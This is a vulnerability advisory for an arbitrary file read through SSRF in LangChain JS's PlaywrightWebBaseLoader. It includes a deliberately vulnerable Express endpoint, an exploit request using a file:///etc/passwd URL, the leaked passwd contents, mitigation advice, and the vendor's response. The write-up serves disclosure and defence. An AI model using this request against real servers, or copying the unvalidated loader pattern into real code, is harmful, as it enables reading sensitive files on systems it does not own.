LangChain JS Arbitrary File Read Vulnerability

Vendor: LangChain

Vendor URL: https://github.com/langchain-ai/langchainjs

Versions Affected:

  • LangChain JS 0.2.2
  • LangChain Community 0.2.2
  • Note: Initial testing used LangChain JS 0.1.37; I confirmed that the latest version is also affected.

Advisory URL: https://huntr.com/bounties/23f45984-7336-48d8-a373-75b39bcd6367

CVE Identifier: N/A

Risk: High (vendor classified as Informative)

Summary

LangChain is an open-source framework designed to assist the development of applications powered by large language models (LLMs). It supports various use cases, including document analysis, summarization, chatbots, and code analysis. LangChain offers libraries in both Python and JavaScript (LangChain JS), enabling developers to integrate LLMs into their applications easily.

My research concerns the JavaScript library. With more than 11,000 stars and more than 380,000 weekly downloads, the project is popular and widely used.

I discovered an Arbitrary File Read (AFR) vulnerability in the LangChain JS library. It allows an attacker to read files on the server that they should not be able to access. The file read is reached through Server Side Request Forgery (SSRF): when an application passes an attacker-controlled URL to the affected loader, the attacker can read arbitrary files on the server and expose sensitive information.

Exploiting AFR via SSRF

To achieve AFR through SSRF, the attacker controls the URL that the server fetches and points it at a resource that the server can reach but the attacker cannot. This is typically done by supplying URLs that refer to internal resources, such as file:// URIs or internal IP addresses.
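As a rough illustration of why such URLs are dangerous, the sketch below uses the standard URL class to show how a few candidate inputs parse. The helper name describeTarget and the example inputs (other than file:///etc/passwd) are assumptions made for illustration only; they are not part of LangChain or of the PoC.

```javascript
// Hypothetical helper: summarize where a user-supplied URL actually points.
function describeTarget(input) {
    const parsed = new URL(input); // throws on strings that are not absolute URLs
    return {
        protocol: parsed.protocol,
        hostname: parsed.hostname,
        pathname: parsed.pathname,
    };
}

// Illustrative inputs: an ordinary web page, a local file, a loopback service.
const candidates = [
    'https://example.com/',
    'file:///etc/passwd',
    'http://127.0.0.1:8080/admin',
];

for (const candidate of candidates) {
    console.log(candidate, describeTarget(candidate));
}
// For 'file:///etc/passwd' the protocol is 'file:', the hostname is empty,
// and the pathname is '/etc/passwd'.
```

All three strings are syntactically valid URLs, so a check that only asks "is this a URL?" accepts every one of them.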

Example

Imagine a web application that provides a URL preview feature. The application fetches the contents of the provided URL to create a preview. If the application does not properly validate the input URL, an attacker could provide a URL pointing to a local file.

Vulnerable Code Snippet

import express from 'express';
import { PlaywrightWebBaseLoader } from "@langchain/community/document_loaders/web/playwright";

const app = express();
const PORT = 9000;

app.get('/', async (req, res) => {
    const url = req.query.url;

    if (!url) {
        return res.status(400).send('URL query parameter is required');
    }

    try {
        const loader = new PlaywrightWebBaseLoader(url);
        const docs = await loader.load();

        console.log(docs);
        res.send(docs);

    } catch (error) {
        console.error(error);
        res.status(500).send('An error occurred');
    }
});

app.listen(PORT, () => {
    console.log(`Server is running on port ${PORT}`);
});

Steps to Exploit

Set the url query parameter to point to a local file on the server. I used the file:// URL scheme. For example:

Req:

GET /?url=file:%2f%2f%2fetc%2fpasswd HTTP/1.1
Host: localhost:9000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0

Res:

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 1322
ETag: W/"52a-DLYTBSZq3dJBHi2DbnbTl6+tY1Y"
Date: Fri, 24 May 2024 20:59:48 GMT
Connection: keep-alive
Keep-Alive: timeout=5

[{"pageContent":"
root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\n_apt:x:42:65534::/nonexistent:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nnode:x:1000:1000::/home/node:/bin/bash\nsystemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin\nmessagebus:x:100:102::/nonexistent:/usr/sbin/nologin\n
","metadata":{"source":"file:///etc/passwd"}}]

The PoC code is available at the following link if you want to try it yourself.

Langchain AFR PoC
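The request above sends the target in percent-encoded form. The sketch below shows how that value decodes, using the standard URLSearchParams class as a stand-in for the framework's query parser (Express uses its own parser, but %2f is decoded to / in the same way). The function name extractTarget is a hypothetical helper.

```javascript
// Hypothetical helper: pull the decoded "url" parameter out of a raw query string.
function extractTarget(rawQuery) {
    const params = new URLSearchParams(rawQuery);
    return params.get('url');
}

const target = extractTarget('url=file:%2f%2f%2fetc%2fpasswd');
console.log(target); // file:///etc/passwd

const parsed = new URL(target);
console.log(parsed.protocol); // file:
console.log(parsed.pathname); // /etc/passwd
```

The decoded value matches the "source" field in the response metadata, which confirms that the loader received and opened the local file path.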

Mitigation

General recommendations:

  • Input Validation: Ensure URLs are properly validated and sanitized.
  • Allowed Domains List: Restrict URL fetching to a specific set of trusted domains.
  • Deny Sensitive Schemes: Block file://, ftp:// and other URL schemes that should not be accessed.
  • Network Segmentation: Limit access to internal network resources.
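The first three recommendations can be combined into a single check that runs before a URL is handed to any loader. What follows is a minimal sketch, not a complete defense: the function name checkUrl and the hosts in ALLOWED_HOSTS are hypothetical placeholders, and the allowlist would need to reflect the domains your application actually trusts.

```javascript
// Hypothetical allowlists; adjust to the application's real requirements.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);
const ALLOWED_HOSTS = new Set(['example.com', 'docs.example.com']);

// Returns { ok: true, url } for acceptable input, or { ok: false, reason } otherwise.
function checkUrl(input) {
    let parsed;
    try {
        parsed = new URL(input); // input validation: must be an absolute URL
    } catch {
        return { ok: false, reason: 'not a valid absolute URL' };
    }
    if (!ALLOWED_PROTOCOLS.has(parsed.protocol)) {
        // rejects file:, ftp: and every other scheme not listed above
        return { ok: false, reason: `scheme ${parsed.protocol} is not allowed` };
    }
    if (!ALLOWED_HOSTS.has(parsed.hostname)) {
        // rejects internal IP addresses and any untrusted domain
        return { ok: false, reason: `host ${parsed.hostname} is not on the allowlist` };
    }
    return { ok: true, url: parsed.href };
}

console.log(checkUrl('file:///etc/passwd').ok);       // false
console.log(checkUrl('http://127.0.0.1/').ok);        // false
console.log(checkUrl('https://example.com/page').ok); // true
```

A check like this only inspects the URL that was submitted. It does not control redirects followed after the initial request, which is one reason the network segmentation item above still matters.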

The URL class built into Node.js helps implement these recommendations. Calling new URL() parses the incoming URL string into an object that exposes its individual components, such as the protocol and hostname, and throws if the string is not a valid URL. Here is a minimal example:

const urlString = "https://example.com";
try {
    const parsedUrl = new URL(urlString);
    if (parsedUrl.protocol !== 'http:' && parsedUrl.protocol !== 'https:') {
        throw new Error('Unsupported protocol');
    }
} catch (error) {
    console.error('Invalid URL:', error.message);
}

This code snippet ensures that only the HTTP and HTTPS protocols are accepted.

Disclosure

This vulnerability was reported to the LangChain team and marked as Informative. The team stated that the loader uses the Playwright project under the hood and that developers are responsible for how they use it.

However, PlaywrightWebBaseLoader is shipped as part of LangChain itself (import { PlaywrightWebBaseLoader } from "langchain/document_loaders/web/playwright";), so I consider the risk to be high.

Also, when I reviewed the LangChain documentation (Link), I could not find any guidance on what precautions to take when accepting a URL from a user.

Update 1

After the GitHub PR (Link), the maintainers said that a docstring could be added but that no changes would be made to the code.

Timeline

2024-05-25 - v1.0

2024-05-30 - v1.1